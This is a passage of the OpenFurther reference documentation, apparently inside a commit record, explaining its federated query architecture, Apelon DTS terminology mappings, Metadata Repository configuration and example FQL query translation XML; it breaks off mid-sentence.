\/home\/demodts\/Apelon_DTS\/dts\/bin\/logs\n\nEnterprise Service Bus (ESB)\n^^^^^^^^^^^^^^^^^^^^^^^^^^^\nServiceMix ESB logs in \/home\/esb\/servicemix\/data\/log\n\nOpenFurther-i2b2\n^^^^^^^^^^^^^^^^\nFURTHeR-i2b2 logs in 2 different locations\n\n* jboss: \/home\/i2b2\/jboss\/server\/default\/logs\n* tomcat: \/home\/i2b2\/tomcat\/logs\n","old_contents":"OpenFurther Reference Documentation\n===================================\n\nAbout\n-----\nThe following documentation applies to *OpenFurther version 1.4.0-SNAPSHOT*\n\nConventions\n~~~~~~~~~~~\n\nNOTE: A note\n\nIMPORTANT: An important point\n\nTIP: A tip\n\nWARNING: A warning\n\nCAUTION: A point of caution\n\nIntroduction\n------------\nOpenFurther is an informatics platform that supports federation and integration of data from heterogeneous and disparate data sources.\n\nIt has been deployed at the University of Utah (UU) as the Federated Utah Research and Translational Health e-Repository (FURTHeR) since August 2011 and is available for use by all U of U employees and students. OpenFurther links heterogeneous data types, including clinical, public health, biospecimen and patient-generated data; empowering researchers with the ability to assess feasibility of particular clinical research studies, export biomedical datasets for analysis, and create aggregate databases for comparative effectiveness research. 
With the ability to link unique individuals from these sources, OpenFurther is able to identify cohorts for clinical research.\n\nIt provides semantic and syntactic interoperability as it federates health information on-the-fly and in real-time and requires neither data extraction nor homogenization by data source partners, facilitating integration by retaining data in their native format and in their originating systems.\n\nOpenFurther is built upon Maven, Spring, Hibernate, ServiceMix, and other open source frameworks that promote OpenFurther's code reusability and interoperability.\n\n\nArchitecture\n------------\nLoosely, OpenFurther runs as a multi-tier application. The presentation layer or front end\/user-interface is served (currently) through the i2b2 web client. The logic layer is served through the ServiceMix ESB, and the database layer is served using Oracle 11g, although it can be configured for other databases as well.\n\nUser Interface\n~~~~~~~~~~~~~~\nOpenFurther utilizes the i2b2 web client as a front-end for querying data. The user interface has been modified to support federated querying.\n\n.Customized i2b2 User Interface\nimage::images\/figures\/i2b2_ui_query_results.png[]\n\nHooking OpenFurther into i2b2\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nOpenFurther utilizes a Java Servlet Filter to divert query requests to the OpenFurther backend system. The Servlet filter looks for XML messages from i2b2 that indicate a query is being run. Those XML messages are then diverted to OpenFurther where OpenFurther converts them into a OpenFurther query and runs them. All other XML messages are ignored and i2b2 is allowed to run as normal. \n\nNOTE: *No data is stored within i2b2, all data resides within its original location*\n\nThe Federated Query Engine (FQE)\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nIn OpenFurther, the term \"FQE\" (Federated Query Engine) is broadly referred to as the set of software modules involved in the execution of a federated query.\n\n.Federated Query Engine\nimage::images\/figures\/fqe.png[]\n\n* A federated query written in FQL (an XML based query language) or an i2b2 query is submitted at *1*.\n* Utilizing the publish-subscribe pattern, one or more data source adapters are subscribed to the Query Topic at *2*. \n* If the query is an i2b2 query, the FQE converts the i2b2 query to a federated query. \n* The FQE then posts the query to the Query Topic (*2*) and each listening data source adapter receives a copy of the query.\n* Each data source adapter runs through a number of steps to initialize, process, and translate a query for a given data source (Explained below). \n* Throughout the processing, status messages are sent to a Status Queue at *3*. \n* Once results are translated to a common model, they are persisted to the In-Memory database and result count is sent to *4*.\n\nData Source Adapters\n~~~~~~~~~~~~~~~~~~~~\nData source adapters are facades around an existing data source. Data source adapters can be entirely custom for any given implementation or they can use a pre-written adapter if their data source is already in a well-known format such as OMOP, i2b2, OpenMRS, etc\n\nData source adpater configuration should follow the configuration steps outlined in reference-manual-datasources link:reference-manual-datasources.pdf[pdf], link:reference-manual-datasources.asciidoc[asciidoc] \n\n.Data Source Adapters\nimage::images\/figures\/data_source_adapters.png[]\n\n* Data source adapters follow the chain-of-responsibility pattern. 
The process of adapting a query is broken down into several small steps and each output is passed on to the next step. Data source adapters typically have 4 commons steps. \n\n1. They are given an initialization step which allows them to determine whether or not the given data source can answer the given query. It also provides for any other initialization required throughout the process. \n2. Query translation translates the logical FQL that is not specific to any data source into data source specific language. This will vary with data sources. Some data sources will utilize SQL, other\u2019s might be a web service. It utilizes the Metadata Repository (MDR) for translating attributes and values (e.g. logical query uses Gender but actual data source uses Sex as the attribute). It also utilizes DTS (Terminology Server) to translate from a given code (e.g. ICD9 250) to the data source\u2019s code (e.g. 12345) \n3. The query is executed against the data source and results are returned in their native format (SQL ResultSet, XML, etc). \n4. Result translations translates the results into a common model with standardized vocabulary\/terminology utilizing the Metadata Repository (MDR) and DTS (Terminology Server).\n\nTerminology Server\n~~~~~~~~~~~~~~~~~~\nOpenFurther utilizes Apelon's Distributed Terminology System version 3.5.2.203 (aka. DTS) for terminology related functionality. The OpenFurther instance of DTS contains concepts from the standard terminologies SNOMED-CT, ICD-9, RxNorm, and UCUM. There are also non-standard terminologies (aka Local) for each of the data sources as well as associated mappings. The use of standard terminologies and mappings make it possible for the software to resolve differences between concepts in various data sources and achieve a degree of semantic interoperability. Use of Apelon DTS is an assumption of agreement to the Apache Version 2 standard open source license agreement http:\/\/www.apache.org\/licenses\/LICENSE-2.0.html. For more information about Apelon DTS please see their website http:\/\/www.apelon.com.\n\nFeatures of Apelon DTS\n^^^^^^^^^^^^^^^^^^^^^^\nThe Apelon DTS (Distributed Terminology System) is an integrated set of open source components that provides comprehensive terminology services in distributed application environments.\n\nDTS Supports national and international data standards, which are a necessary foundation for comparable and interoperable health information, as well as local vocabularies.\n\nDTS consists of\n\n* DTS Core - the core system, database, api, etc\n* DTS Editor - a GUI interface for viewing, adding, and editing concepts\n* DTS Browser - a web interface for viewing concepts\n* Modular Classifier - allows for extending standard ontologies\n\nTerminology\n-----------\n\nGetting Started\n~~~~~~~~~~~~~~~\nIn order to utilize the OpenFurther software, it is necessary to have terminology mappings from your desired data sources to standard terminologies. These standard codes are then translated via the software, terminology server, and associated mappings to be able to resolve to a local data source's codes\/terms.\n\nIMPORTANT: It is important to note that the content distributed with OpenFurther is for demonstration purposes only. The standard terminologies have been provided with permission via Apelon's distribution of free subscription content available on their open source website link:http:\/\/apelon-dts.sourceforge.net\/[]. 
This standard content is several years out of date and would not be the most suitable for a real world instance. \n\nTIP: It is recommended for organizations that desire to use the OpenFurther software to consider resourcing a dedicated terminologist or someone that has experience with controlled vocabularies and ontologies to work on managing\/mapping local vocabularies\/codes to their specific implementation of OpenFurther.\n\nApelon provides a content delivery subscription service at a reasonable cost. Standard terminologies can also be downloaded from the U.S. National Library of Medicine Unified Medical Language System (link: http:\/\/www.nlm.nih.gov\/research\/umls\/[UMLS]) after meeting and accepting their requirements and license agreements. \n\nNOTE: The local vocabularies have been mapped to the best possible matches to the available standard terminologies. However, in some cases such as OpenMRS, local concepts had to be created to fit the OpenFurther demonstration scenario. Any creation of local concepts was done in best accordance of the specifications provided by the source. \n\nOpenFurther's i2b2 front end user interface contains an ontology based off of the recommendations of the Healthcare Information Technology Standards Panel (HITSP). For instance, HITSP recommends the use of ICD-9 codes for diagnosis and LOINC for laboratory data. Please note that because of licensing agreements, not all of the HITSP recommendations could be followed for OpenFurther. For example, HITSP recommends the use of CPT for procedures. In OpenFurther, procedures will be based off the SNOMED CT hierarchy for procedures.\n\nWhy are mappings needed?\n^^^^^^^^^^^^^^^^^^^^^^^\nMappings are needed because of the variations in terminology used between disparate data sources. Mappings equate concepts that are intended to mean the same thing. \n\nTIP: Mapping can be a very human labor intensive task. Mappings must be verified and tested to ensure quality of results. Involving subject matter experts and collaborating effectively across datasources will be paramount to achieving a successful implementation of terminology.\n\n.Mapping Terminology\nimage::images\/figures\/mapping_terminology.png[]\n\nInitial Steps\n^^^^^^^^^^^^^\nApelon DTS provides excellent documentation and examples of how to use their terminology server software. All Apelon documentation can be found at: http:\/\/apelon-dts.sourceforge.net\/documents.html\n\nIMPORTANT: It is highly recommended that you familiarize yourself with the basic use of the Apelon DTS software. The instance included in OpenFurther can serve as an example of how the OpenFurther team has used Apelon DTS but the best instruction on how to use Apelon DTS is provided directly from Apelon. 
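To make the role of mappings concrete, the sketch below shows the general idea behind translating a standard code to a data source's local code. This is only an illustration and not OpenFurther's or Apelon's API: the CodeMappingTable class, its method names, and the sample local code are hypothetical, and in a real deployment the lookup is performed by Apelon DTS using the mappings maintained there.

.Illustrative code translation lookup (hypothetical, not the DTS API)
[source,java,numbered]
----
import java.util.HashMap;
import java.util.Map;
import java.util.Optional;

// Hypothetical stand-in for a terminology mapping: (namespace, code) -> local code
public class CodeMappingTable
{
	// Key is "namespaceId^code"; value is the data source's local code
	private final Map<String, String> mappings = new HashMap<>();

	public void addMapping(final long namespaceId, final String code, final String localCode)
	{
		mappings.put(namespaceId + "^" + code, localCode);
	}

	public Optional<String> translate(final long namespaceId, final String code)
	{
		return Optional.ofNullable(mappings.get(namespaceId + "^" + code));
	}

	public static void main(final String[] args)
	{
		final CodeMappingTable table = new CodeMappingTable();
		// e.g. an ICD-9 code (namespace 10) mapped to a hypothetical local code
		table.addMapping(10, "250", "12345");
		System.out.println(table.translate(10, "250")); // Optional[12345]
		System.out.println(table.translate(10, "401")); // Optional.empty, i.e. an unmapped concept
	}
}
----

An unmapped concept is exactly the situation the mapping work described in this section is meant to avoid: a query that reaches a data source with no equivalent local code simply cannot match any data there.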
\n\nLocal Namespaces\n++++++++++++++++\nRefer to page http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#62[62] of the Apelon DTS Editor documentation.\n\nAuthorities\n+++++++++++\nRefer to page http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#72[72] of the Apelon DTS Editor documentation.\n\nAssociation Types\n+++++++++++++++++\nRefer to pages http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#75[75-77] of the Apelon DTS Editor documentation.\n\nAssociation Qualifier Types\n+++++++++++++++++++++++++++\nRefer to pages http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#80[80-84] of the Apelon DTS Editor documentation.\n\nProperty Types\n++++++++++++++\nRefer to pages http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#94[94-96] of the Apelon DTS Editor documentation.\n\nProperty Qualifier Types\n++++++++++++++++++++++++\nRefer to pages http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#99[99-101] of the Apelon DTS Editor documentation.\n\nAdding new concepts\/terms, assign properties, assosciations\/mappings\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\nRefer to pages http:\/\/apelon-dts.sourceforge.net\/3.5\/docs\/dtseditor.pdf#119[119-141] of the Apelon DTS Editor documentation.\n\nBulk loading and working with spreadsheets\n++++++++++++++++++++++++++++++++++++++++++\n\nRefer to the import wizard plugin http:\/\/sourceforge.net\/apps\/trac\/apelon-dts\/raw-attachment\/wiki\/MiscWikiFiles\/importwizarduserguide-3.0.pdf[user guide]\n\n\nThe Metadata Repository (MDR)\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nThe MDR is responsible for storing information (artifacts) about varying data sources. This includes things like data models, attributes, attribute types, etc. It is accessed using web services.\n\n* Home grown but follows standards\n** XMI, Dublin Core\n** HL7 datatypes, CDA, DDI\n* Stores artifacts\n** Logical models (UML), local models (UML), model mappings\n** Administrative information\n** Descriptive information\n* Models supported\n** OMOP, i2b2, local models\n\nMetadata Repository (MDR)\n-------------------------\n\nGetting Started\n~~~~~~~~~~~~~~~\nTwo important functions supported by the metadata repository are Query Translation and Result Translation. Data stored within the MDR is used to drive each of these processes.\n\n.Translating Metadata\nimage::images\/figures\/translating_metadata.png[]\n\nQuery Translation\n^^^^^^^^^^^^^^^^^\nThe objective of a query translation is to convert the OpenFurther Query Language (FQL) query (OpenFurther's classes, attributes, and attribute values) into the target physical data source's data classes, attributes, and attribute values while maintaining the integrity of the query logic. If the attributes being queried does not exist in the external target data source, no data will be returned from the particular source. Therefore, the end user must carefully select the attributes to ensure that they exist in the target of interest.\n\n.Query Translation\nimage::images\/figures\/query_translation.png[]\n\nThe user interface, currently i2b2, is responsible for building a query. When a query is submitted to the FQE, the FQE converts i2b2's query into the FQL, an XML representation of the query (see the FQL XML Schema) that consists of logical expressions using OpenFurther's data model classes and attributes. 
Class and class attribute names used in FQL are based on OpenFurther classes and attributes and can be found in OpenFurther's Java code located here: https:\/\/github.com\/openfurther\/further-open-core\/tree\/master\/ds\/ds-further\/src\/main\/java\/edu\/utah\/further\/ds\/further\/model\/impl\/domain\n\nCoded class attribute value domains within the OpenFurther model are all based on standard terminology where demographics are SNOMED CT codes, diagnoses are ICD-9 codes, and labs are LOINC codes. All attributes that have coded value sets also have an associated attribute that ends with the term 'NamespaceId' (namespaces are also called coding systems). This NamespaceId attribute is used to signify what coding system a particular attribute will use. For instance, raceCode=413773004 and raceCodeNamespaceId=30 would signify the SNOMED CT code for the Caucasian race.\n\nBy default, Apelon DTS reserves certain identifiers for use with standard terminologies.\n\n.Apelon DTS Namespace Identifiers\n[width=\"40%\",frame=\"topbot\",options=\"header\"]\n|======================\n|Namespace |Identifier\n|SNOMED CT |30\n|ICD-9 |10\n|LOINC |5102\n|RxNorm |1552\n|======================\n\nExample input and output\n++++++++++++++++++++++++\n\n.Example query translation input\n[source,xml,numbered]\n<query xmlns=\"http:\/\/further.utah.edu\/core\/query\" \n\txmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\n\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\" rootObject=\"Person\">\n\t<rootCriterion>\n\t\t<searchType>CONJUNCTION<\/searchType>\n\t\t<criteria>\n\t\t\t<searchType>SIMPLE<\/searchType>\n\t\t\t<parameters>\n\t\t\t\t<parameter xsi:type=\"RelationType\">EQ<\/parameter>\n\t\t\t\t<parameter xsi:type=\"xs:string\">\n\t\t\t\t\traceNamespaceId\n\t\t\t\t<\/parameter>\n\t\t\t\t<parameter xsi:type=\"xs:long\">30<\/parameter>\n\t\t\t<\/parameters>\n\t\t<\/criteria>\n\t\t<criteria>\n\t\t\t<searchType>SIMPLE<\/searchType>\n\t\t\t<parameters>\n\t\t\t\t<parameter xsi:type=\"RelationType\">EQ<\/parameter>\n\t\t\t\t<parameter xsi:type=\"xs:string\">race<\/parameter>\n\t\t\t\t<parameter xsi:type=\"xs:string\">\n\t\t\t\t\t413773004\n\t\t\t\t<\/parameter>\n\t\t\t<\/parameters>\n\t\t<\/criteria>\n\t<\/rootCriterion>\n\t<sortCriteria \/>\n\t<aliases \/>\n<\/query>\n\nGiven the above input, query translation would generate the following output.\n\n.Example query translation output\n[source,xml,numbered]\n<query xmlns=\"http:\/\/further.utah.edu\/core\/query\" \n\txmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\n\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\" rootObject=\"Person\">\n\t<rootCriterion>\n\t\t<searchType>CONJUNCTION<\/searchType>\n\t\t<criteria>\n\t\t\t<searchType>SIMPLE<\/searchType>\n\t\t\t<parameters>\n\t\t\t\t<parameter xsi:type=\"RelationType\">EQ<\/parameter>\n\t\t\t\t<parameter xsi:type=\"xs:string\">\n\t\t\t\t\traceConceptId\n\t\t\t\t<\/parameter>\n\t\t\t\t<parameter xsi:type=\"xs:decimal\">\n\t\t\t\t\t4185154\n\t\t\t\t<\/parameter>\n\t\t\t<\/parameters>\n\t\t<\/criteria>\n\t<\/rootCriterion>\n\t<sortCriteria \/>\n\t<aliases \/>\n<\/query>\n\nResult Translation\n^^^^^^^^^^^^^^^^^^\nEach data source queried by OpenFurther will respond with a result set in the platform\/database specific format, which needs to be converted into OpenFurther's data model for final analysis and reconciliation of the returned data from each data source, i.e. all the pears, oranges, and pineapples need to be converted to the same kind of apples. 
This is the job of the query result set translations, to translate all the query results back to a common\/canonical\/platform-independent model, or the OpenFurther model in this case.\nOpenFurther uses XQuery code to translate platform-specific result sets to the OpenFurther model, which implies that all data must be converted to XML. Converting to XML is not an extra cost since OpenFurther is a web service-centric infrastructure where messages between services are communicated via XML. Query results are no exception. Data within the MDR drives the XQuery code to translate the data source specific data model and values to the OpenFurther data model and values based on standard terminology. After the XML has been translated, the data are unmarshaled back to Java objects, the OpenFurther model Java objects, where they are persisted to the query results database (typically the in-memory database) using Hibernate.\n\n.Result Translation\nimage::images\/figures\/result_translation.png[]\n\nCreating metadata in the MDR\n++++++++++++++++++++++++++++\nTranslations depend on the MDR for attribute-to-attribute translations. The MDR is supported by an abstract data model where metadata \"things\" are Assets (see the FMDR.ASSET table), including data classes and class attributes. There are other Asset supporting tables ASSET_VERSION and ASSET_RESOURCE that you can ignore for now, as they are not currently used for this purpose. There are, however, two other tables that are critical, ASSET_ASSOC (association) and ASSET_ASSOC_PROP (association properties). ASSET, ASSET_ASSOC, and ASSET_ASSOC_PROP work together to describe attribute-to-attribute translation mappings. Assets also represent association types, such as hasAttribute, or translatesTo. The MDR contains metadata used for both Query Translations and Result Translations.\n[NOTE]\nThe MDR is configured using Java class and Java field names, rather than database table and attribute names.\n\nThere are 3 phases to configure a new data source for the MDR.\n\n.Phase 1\nThe first thing that should happen is to create a Mapping of the FURTHER model to your local data model. This step is generally performed by a Terminologist and\/or Data Architect and has no specific configuration with the MDR, but serves as the business requirements or data dictionary document for configuring the MDR in Phases 2 and 3.\n\nYou can use this Excel file as an example:\n(Click on the Raw Link to save the file)\n\nhttps:\/\/github.com\/openfurther\/further-open-doc\/blob\/master\/files\/OpenMRS_Mappings_Demo.xls\n\n.Phase 2\nConfigure your local data source for the MDR.\n\nYou should review and have a fair understanding of the following MDR data model before proceeding.\n\n.MDR ERD Diagram\nimage::images\/figures\/fmdr.png[MDR ERD Diagram]\n\n\/\/ Here is just One way of having a blank line with asciiDoc\n{empty} +\n\nUse this Excel file as an example:\n(Click on the Raw Link to save the file)\n\nhttps:\/\/github.com\/openfurther\/further-open-doc\/blob\/master\/files\/OpenMRS_Asset_Demo.xls\n\nThe Excel File's Instructions Tab contains the following high-level steps:\n\n1. Create a namespace - a namespace is itself an Asset of Asset type namespace (see other namespace Assets for examples). \nRetrieve the newly created Asset ID for MyNamespace and use this Asset ID to create your classes and attributes in Steps 2 & 3.\n2. 
Create a class in MyNamespace - this is done by creating another Asset that is of type Physical Class.\nRetrieve the newly created Asset ID for MyClass and use this Asset ID to create your Class-To-Attributes Associations in Step 4.\n3. Create the class attributes in MyNamespace - this is done by creating Assets that are of type Class Attribute.\n4. Associate all of the class attributes with your class by creating an Asset Association (ASSET_ASSOC) to create the associations myPhysicalClass hasAttribute myClassAttribute for each of the attributes created in Step 3.\n\n.Phase 3\nConfigure FURTHER to External Data Source Associations and Properties\n\nUse this Excel file as an example:\n(Click on the Raw Link to save the file)\n\nhttps:\/\/github.com\/openfurther\/further-open-doc\/blob\/master\/files\/OpenMRS_Assoc_Demo.xls\n\nThe Excel File's Instructions Tab contains these following high level steps:\n\n1. Configure FURTHER Attribute (Java Field) to External Attribute (Java Field) Associations.\nFor example, OpenFurther.Person.dateOfBirth to MyNamespace.myPatient.birthDate. The direction of this relationship is crucial, LS=left side, RS=right side, so that OpenFurther.Person.dateOfBirth (left side) maps to myPerson.birthDate (right side) using the association \"translatesTo\". The view ASSET_ASSOC_V illustrates existing mappings that are enabled. Note that associations can be \"disabled\" with a \"N\" in the asset_assoc.enabled field.\n2. Configure FURTHER Table (Java Class) to External Table (Java Class) Associations.\nFor example, OpenFurther.Person to MyNamespace.myPatient. The direction of this relationship is crucial, LS=left side, RS=right side, so that OpenFurther.Person (left side) maps to MyNamespace.myPatient (right side) using the association \"translatesTo\". The view ASSET_ASSOC_V illustrates existing mappings that are enabled. Note that associations can be \"disabled\" with a \"N\" in the asset_assoc.enabled field.\n3. Create translatesTo association translation properties for the above 2 steps.\nTranslation associations (and other associations) can have properties (in ASSET_ASSOC_PROP table) that describe the translation mapping requirements. For example, some properties may direct a data type conversion such as int to string, while others may declare a function that needs to be used for a functional conversion, or even an instruction to not change an attribute name. Properties are created via the ASSET_ASSOC_PROP table and are associated to ASSET_ASSOC records.\n\n[NOTE]\nThere are two parts to the list of Potential Association Properties. \nPart One is primarily used for Query Translations, and part Two is used for Result Translations. 
\nQuery Translations are much more complex and therefore supports more association properties than Result Translations.\n\n[NOTE]\nGeneral Error Handling Note:\nIf you query an Attribute (Data Element) that exists in the Central Data Model, but is missing and does not have an associated Attribute in the External Data Model, the XQuery Query Translation program is expected to Error out with the missing data element specified.\nThe reasoning is because when a data element is missing from a criteria, the definition of the entire query is changed, and therefore invalidates the entire Query.\nThis Error will halt the entire Query Processing Session.\nHowever, for Result Translation, Missing data elements are not critical since the rest of the data values are still valid and may be valuable to the researchers.\nTherefore, a missing data element association in Result Translations will not halt the entire Result Translation process.\n\n.Part One (Query Translations)\nThere are Normal Scenarios and Special Scenarios for Query Translations.\n\n.Normal Scenario 1) Configure for DTS Coded Value Translation with:\nProp_Name = ATTR_VALUE_TRANS_FUNC\n\nProp_Val = translateCode\n\n.Normal Scenario 2) Configure for Data Type Translation with:\nProp_Name = ATTR_VALUE_TRANS_TO_DATA_TYPE\n\nProp_Val = xs:decimal (Or other appropriate valid XML Data Types)\n\n.Java Data Type to XML Data Type Mapping. There may be others not listed here.\n[options=\"header\"]\n|=======================\n|Java Data Type | XML Data Type\n|char or java.lang.Character | xs:string\n|byte or java.lang.Byte | xs:byte\n|short or java.lang.Short | xs:short\n|int or java.lang.Integer | xs:int\n|long or java.lang.Long | xs:long\n|float or java.lang.Float | xs:float\n|double or java.lang.Double | xs:double\n|boolean or java.lang.Boolean | xs:boolean\n|java.lang.String | xs:string\n|java.math.BigInteger | xs:integer\n|java.math.BigDecimal | xs:decimal\n|java.util.Calendar | xs:dateTime\n|java.util.Date | xs:dateTime\n|javax.xml.namespace.QName | xs:QName\n|java.net.URI | xs:string or xs:anyURI\n|javax.xml.datatype.XMLGregorianCalendar | xs:anySimpleType\n|javax.xml.datatype.Duration | xs:duration\n|java.lang.Object | xs:anyType\n|java.awt.Image | xs:base64Binary\n|javax.activation.DataHandler | xs:base64Binary\n|javax.xml.transform.Source | xs:base64Binary\n|java.util.UUID | xs:string\n|=======================\n\n.Normal Scenario 3) Configure property for the Composite ID Association.\nThis is currently needed to support queries within previous Query Result Sets.\n\nProp_Name = ATTR_VALUE_TRANS_TO_JAVA_DATA_TYPE\n\nProp_Val = Java Data Type of the external person ID that is associated with the OpenFurther.Person.compositeId\n\nFor example,\n\nProp_Name = ATTR_VALUE_TRANS_TO_JAVA_DATA_TYPE\n\nProp_Val = java.lang.Integer\n\n.Normal Scenario 4) Configure 2 properties, Alias_Key and Alias_Value for each Table Association.\nIf there are more than one table associations, configure multiple pairs of these properties.\n\nThe Prop_Val for ALIAS_KEY can be anything. 
\n\nFor example,\n\nProp_Name = ALIAS_KEY\n\nProp_Val = dx\n\nIf your data source requires a Static Alias Key Prop_Val, append 'STATIC^' to your Alias Key Prop_Val.\n\nUse this example:\n\nProp_Name = ALIAS_KEY\n\nProp_Val = STATIC^Diagnosis\n\nNow, configure the ALIAS_VALUE Property.\n\nThe Prop_Val for ALIAS_VALUE is the Java member name within the rootObject (Person Class).\n\nFor example,\n\nProp_Name = ALIAS_VALUE\n\nProp_Val = conditionEras\n\n.Special Scenario 1) Occasionally, there may be some value translations that are non-coded values. For example, if you associate age to birthYear, you will need a special custom XQuery function to perform the translation. In this case, create a function in the XQuery program called ageToBirthYear and configure the MDR with this property.\n\nProp_Name = ATTR_VALUE_TRANS_FUNC\n\nProp_Val = ageToBirthYear\n\nSo instead of the normal translateCode in the Prop_Val, we have \"ageToBirthYear\".\n\n.Special Scenario 2) Each Asset Association by default specifies that Left Asset translates to Right Asset. However, if you want to skip this translation without throwing an Error, provide an association property with the following. This is mostly used with devNull associations. For example, the FURTHER.PERSON.ID.DATASETID does not translate to anything at the External Data Sources, however, we do not want to consider this as an Error, therefore, we simply skip it from translation processing. This property is used for only Special attributes such as datasetID, and Qualifier \"Type\" attributes. This skipping property should NOT be applied to normal attributes, where an Error is expected.\n\nProp_Name = ATTR_TRANS_FUNC\n\nProp_Val = skipAttr\n\n.Special Scenario 3) The FURTHER table attribute Observation.observation is overloaded as Diagnosis, Procedure, and Lab Order. If the FURTHER.Observation table translates to more than one table at the External Data Source, we must provide this property to assist with Query Translation. This property specifies the type of observation (Diagnosis, Procedure, or Lab) in the FURTHER model so we know what kind of data the row is representing. The Prop_Val is the SNOMED code representing the observation type. If the FURTHER.Observation table translates to ONLY one table at the external data source, we do not need to configure this, but do ensure that the ALIAS_KEY and ALIAS_VALUE properties are configured properly as stated above in Normal Scenario 4. Always start the Prop_Name with \u201cOBSERVATION_TYPE\u201d.\n\nNote: OBSERVATION_TYPE_DX means Diagnosis.\n\nProp_Name = OBSERVATION_TYPE_DX\n\nProp_Val = 439401001\n\nOr\n\nProp_Name = OBSERVATION_TYPE_LAB\n\nProp_Val = 364712009\n\nOr\n\nProp_Name = OBSERVATION_TYPE_PROCEDURE\n\nProp_Val = 71388002\n\n\n.Special Scenario 3 Addendum) To distinguish between coding standards with the Same Observation Type.\nWhen you have multiple attributes that translate to multiple coding standards in the external data source, you will need to configure the Prop_Name with a unique name and append the DTS Namespace ID to the Prop_Val. 
Replace the ^DTS_Namespace_ID with whatever you are actually using in your DTS environment.\n\nFor Diagnosis, using ICD9\n\nProp_Name = OBSERVATION_TYPE_DX_ICD9\n\nProp_Val = 439401001^10\n\nFor Diagnosis, using ICD10\n\nProp_Name = OBSERVATION_TYPE_DX_ICD10\n\nProp_Val = 439401001^1518\n\nif you would like to force a specific observationType and namespace combination to Error Out,\nyou append '^E' at the end of the Prop_Name like this:\n\nProp_Name = OBSERVATION_TYPE_DX_ICD10^E\n\nProp_Val = 439401001^1518\n\n\n.Special Scenario 4) Sometimes one FURTHER <criteria> node translates to two <criteria> nodes at the External Data Source. For example, FURTHER.Person.race translates to OpenMRS.PersonAttribute.value, where the PersonAttributeType = 1. Therefore, we need one <criteria> for the OpenMRS.PersonAttribute.value and another <criteria> node for OpenMRS.PersonAttribute.PersonAttributeType. What we will do is create an XML Template in the MDR where we will replace a specific <criteria> with the translated criteria. Refer to the example below. \n\nTo configure a XML Template, use this Property:\n\nProp_Name = MORE_CRITERIA\n\nProp_Val = {XML Template} (In One Continuous String is better for output format)\n\nWhere Prop_Val =\n\/\/ Not sure why i cannot use \n\/\/ [source,xml] to display source code here...\n\n<criteria xmlns=\"http:\/\/further.utah.edu\/core\/query\"\n xmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\" \n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\">\n\t<searchType>IN<\/searchType>\n\t<parameters>\n\t\t<parameter xsi:type=\"xs:string\">personId<\/parameter>\n\t<\/parameters>\n\t<query rootObject=\"Person\" xmlns=\"http:\/\/further.utah.edu\/core\/query\"\n\t\txmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\" xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\">\n\t\t<rootCriterion>\n\t\t\t<searchType>CONJUNCTION<\/searchType>\n\t\t\t<criteria moreCriteria=\"ReplaceMe\"><\/criteria>\n\t\t\t<criteria>\n\t\t\t\t<searchType>SIMPLE<\/searchType>\n\t\t\t\t<parameters>\n\t\t\t\t\t<parameter xsi:type=\"RelationType\">EQ<\/parameter>\n\t\t\t\t\t<parameter xsi:type=\"xs:string\">pa.personAttributeType<\/parameter>\n\t\t\t\t\t<parameter xsi:type=\"xs:long\">1<\/parameter>\n\t\t\t\t<\/parameters>\n\t\t\t<\/criteria>\n\t\t<\/rootCriterion>\n\t\t<aliases>\n\t\t\t<alias associationObject=\"PersonAttribute\">\n\t\t\t\t<key>pa<\/key>\n\t\t\t\t<value>personAttributes<\/value>\n\t\t\t<\/alias>\n\t\t<\/aliases>\n\t<\/query>\n<\/criteria>\n\n.Special Scenario 5) Sometimes a FURTHER Person Field translates to a non-person table at the external source. Since we do not get <alias> nodes for FURTHER Person Fields, we need to create new alias(es) for these scenarios. For example, FURTHER.Person.vitalStatus translates to OpemMRS.ObservationPeriod.personStatusConceptId field. In this case, use this property configuration:\n\nProp_Name = ATTR_ALIAS\n\nProp_Val = \u201caliasKey^aliasValue\u201d\n\nWhere, Prop_Val = \u201cop^observationPeriods\u201d\n\nNote that duplicate Aliases are removed during the cleanup phase. So having more than one of these configured is ok. However, in order to support \u2018AND\u2019 conditions with multiple fields in the SAME table, we need to replace <criteria> with a subquery template using Special Scenario 4 above. \n\n.Special Scenario 6) Add Extra Alias for Special Cases\nSometimes we have an alias that translates to multiple aliases due to hierarchy relationship levels. This EXCLUDES Observation Types Issues. 
For example, FURTHER.orders table translates to OpenMRS.patient.orders table. Therefore, we need another alias to support the Sub Level. We need the Translated aliases to be like this, where the ord will go through the patient object:\n\n<aliases>\n <alias associationObject=\"Observations\">\n <key>p<\/key>\n <value>patient<\/value>\n <\/alias>\n <alias associationObject=\"Order\">\n <key>ord<\/key>\n <value>p.orders<\/value>\n <\/alias>\n<\/aliases>\n\nNote that for this situation, we DO NOT want to update any parameter alias values in the XML Query file.\n\nProp_Name = EXTRA_ALIAS\n\nProp_Val = \u201caliasKey^aliasValue\u201d\n\ni.e. Prop_Val = \u201cobs^observations\u201d\n\nNote that duplicate Aliases are removed during the cleanup phase. So having more than one of these configured is ok. However, in order to support \u2018AND\u2019 conditions with multiple fields in the SAME table, we need to replace <criteria> with a subquery template using Special Scenario 4 above.\n\n.Special Scenario 7) To activate Dynamic Custom Function Calls, we can configure a function name, prefixed with 'CUSTOM^fqt:'.\nYou must have a XQuery function with a matching name for this to work. \nNote that the function name must be prefixed with the 'fqt:' XQuery Namespace.\n\nFor example, if you want to apply a Custom XQuery function yearFromDateTime to the value to be 